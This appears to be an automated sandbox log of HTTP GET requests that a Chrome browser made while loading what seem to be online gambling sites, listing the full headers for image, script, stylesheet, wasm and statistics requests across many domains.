Source: global trafficHTTP traffic detected: GET /cc.png?r=2654442886 HTTP/1.1Host: zb-qq.gzjqwlkj.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://yh8613.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://yh8613.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/index/383/menu/menubg.jpg HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb1-hw.qectyoua.com/pc/240516-03/static/css/t4045.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/allbet_h.jpg HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb1-hw.qectyoua.com/pc/240516-03/static/css/t4045.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/mg_h.jpg HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb1-hw.qectyoua.com/pc/240516-03/static/css/t4045.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/bootstrap-dialog.min.js HTTP/1.1Host: 8vpfnx.eveday.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://e933002.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/layer.js HTTP/1.1Host: 8vpfnx.eveday.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://e933002.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/jquery/jquery.super-marquee.js HTTP/1.1Host: 8vpfnx.eveday.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://e933002.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /zb-cloud/stat.do?pv=ajax&pa=host.info&domain=yh8613.cc&terminal=1&r=3506563745 HTTP/1.1Host: ahd-ocssn.qqxgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://yh8613.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://yh8613.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /mimlib.wasm HTTP/1.1Host: stt-wasm.ai4funs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/css/t4043.css HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://js326.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /zb-cloud/stat.do?pv=ajax&pa=host.info&domain=yh8613.cc&terminal=1&r=3506563745 HTTP/1.1Host: ocsapi-lc.tingmeikj.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://yh8613.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://yh8613.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fiximg/ac-20200404/fileupload/ll12/202312/202312180557505.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ocs/cc.png?1717972858650 HTTP/1.1Host: ocsapi-aka.blackkhaki918.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ocs/cc.png?1717972858649 HTTP/1.1Host: ocsapi-aws.bakeddove.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /zb-cloud/stat.do?pv=ajax&pa=host.info&domain=wns732.cc&terminal=1&r=3425276221 HTTP/1.1Host: ahd-ocssn.qqxgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aliyungf_tc=3de529fcf893d6d3ee212d9780b2d6d818dae7d7247c306b9d3885f4ac9f9c38
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/css/t3685.css HTTP/1.1Host: zb-qq.gzjqwlkj.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://yh8613.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/public/vendor.dll.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://js326.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/lib/jquery.min-1.9.1.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://js326.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/jquery/jquery.nicescroll.min.js HTTP/1.1Host: 8vpfnx.eveday.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://e933002.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /zb-cloud/stat.do?pv=ajax&pa=host.info&domain=wns732.cc&terminal=1&r=3425276221 HTTP/1.1Host: ocsapi-lc.tingmeikj.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/js/jquery/plugins/jquery.validate/jquery.validate.js HTTP/1.1Host: 8vpfnx.eveday.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://e933002.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/js/gamebox/common/jquery.validate.extend.msites.js HTTP/1.1Host: 8vpfnx.eveday.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://e933002.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wasm_exec.js HTTP/1.1Host: stt-wasm.ai4funs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://xpj723.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /mimlib.wasm HTTP/1.1Host: stt-wasm.ai4funs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/plain, */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://xpj723.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://xpj723.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /lt-cloud/stat.do?pv=ajax&pa=host.info&domain=js326.cc&withAgentCode=1&withSettings=1&terminal=1&ts=17972860577817 HTTP/1.1Host: ocsapi-aka.blackkhaki918.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/ag_h.jpg HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb1-hw.qectyoua.com/pc/240516-03/static/css/t4045.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/sunbet_h.jpg HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb1-hw.qectyoua.com/pc/240516-03/static/css/t4045.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fiximg/ac-20200404/fileupload/ll12/202307/202307192352577.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/plain, */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://xpj723.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://xpj723.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/t4044-otherConf-js.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://xpj723.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fiximg/ac-20200404/fileupload/ll12/202312/202312222129050.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/plain, */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://hg679.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/index/312/parner/logo_italy.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/t4044-index-js.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://xpj723.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/og_h.jpg HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb1-hw.qectyoua.com/pc/240516-03/static/css/t4045.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/index/312/app/h5_icon.png.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/index/312/parner/logo_bolin.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /mt-cloud/api/sn.maintain HTTP/1.1Host: ocsapi-aws.huayidm.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/gd_h.jpg HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb1-hw.qectyoua.com/pc/240516-03/static/css/t4045.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: yh8613.ccConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: com_env=p; p_skin=t3685; skin=t3685; p_sn=uy09; sn=uy09
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/gc_h.jpg HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb1-hw.qectyoua.com/pc/240516-03/static/css/t4045.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/lebo_h.jpg HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb1-hw.qectyoua.com/pc/240516-03/static/css/t4045.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/index/312/app/01.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/index/312/app/02.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/index/312/app/06.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/index/312/app/04.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ocs/cc.png?1717972860984 HTTP/1.1Host: ocsapi1961.hydqef.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/manifest.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://js326.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
